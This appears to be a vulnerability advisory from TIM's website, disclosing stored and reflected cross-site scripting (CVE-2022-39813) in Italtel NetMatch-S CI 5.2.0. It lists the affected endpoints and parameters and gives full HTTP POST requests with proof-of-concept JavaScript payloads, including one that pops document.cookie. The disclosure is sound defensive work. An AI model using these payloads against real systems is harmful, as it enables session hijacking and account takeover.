La nuova immagine di TIM
Una nuova immagine con uno stile dinamico, colori moderni e persone che occupano quasi interamente la scena. Scopri di più
Presentazione dei Risultati H1 2025
Vai alla pagina
La Sostenibilità per TIM
Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci
Ultimi Comunicati Stampa
Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati
Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813
CVSv3: 6,1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.
Step-by-step instructions and PoC.
The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
o HTTP POST Parameter: j_username
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
o HTTP POST Parameter: name, actLine
Below are the evidences with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27
The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>
The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.
Security Impact
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.